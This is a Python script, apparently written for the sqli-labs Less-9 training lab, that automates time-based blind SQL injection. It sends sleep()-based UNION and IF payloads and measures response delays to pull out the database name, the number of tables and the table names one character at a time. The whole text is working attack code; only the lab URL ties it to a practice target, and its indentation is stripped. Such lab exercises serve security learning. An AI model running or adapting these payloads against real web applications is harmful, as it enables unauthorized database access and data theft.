import requests
import time
MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'
target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"
def get_DBName_len():
print("Start to get DBName_len...")
DBName_len = 0
url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"
for i in range(0, MAX_DBName_len):
starttime = time.time()
url = url_template.format(i)
response = requests.get(url)
if time.time()-starttime > 3:
DBName_len = i;
print("DBName_len is: ", DBName_len)
break;
if DBName_len == 0:
if i == MAX_DBName_len - 1:
print("DBName_len > MAX_DBName_len!")
print("Cannot get DB_len. Program ended.")
exit()
return DBName_len
def get_DBName(DBName_len):
print("Start to retrieve database name...")
DBName = ""
url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"
for i in range(1, DBName_len + 1):
tempDBName = DBName
for char in chars:
char_ascii = ord(char)
url = url_template.format(i, char_ascii)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
DBName += char
break
if tempDBName == DBName:
print("Letters too little! Program ended.")
exit()
print("Retrieve completed! DBName is: " + DBName)
return DBName
def get_TableNumOfDB(DBName):
print("Start to get TableNumOfDB...")
TableNumOfDB = 0
url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true) %2D%2D%20"
for i in range(0, MAX_Table_Num):
url = url_template.format(i)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableNumOfDB = i;
print("the number of table is:" , TableNumOfDB)
break
if TableNumOfDB == 0:
if i == TableNumOfDB - 1:
print("table number of database > MAX_TableName_len!")
return TableNumOfDB
def get_TableName_len(Table_num):
print("Start to get TableName_len...")
TableName_len = 0
url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true) %2D%2D%20"
for i in range(0, MAX_TableName_len):
url = url_template.format(Table_num - 1, i)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableName_len = i
break
if TableName_len == 0:
if i == MAX_TableName_len - 1:
print("TableName_len > MAX_TableName_len!")
return TableName_len
def get_TableName(Table_num, TableName_len):
print("Start to get TableName...")
TableName = ""
url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true) %2D%2D%20"
for i in range(1, TableName_len + 1):
tempTableName = TableName
for char in chars:
char_ascii = ord(char)
url = url_template.format(Table_num - 1, i, char_ascii)
starttime = time.time()
response = requests.get(url)
if time.time()-starttime > 2:
TableName += char
break
if tempTableName == TableName:
print("Letters too little! Program ended.")
exit()
print("Retrieve completed! TableName is: " + TableName)
return TableName
#print("tables in "+DBName+":")
for i in range(0,4+1):
TableName_len = get_TableName_len(i)
TabName = get_TableName(i,TableName_len)
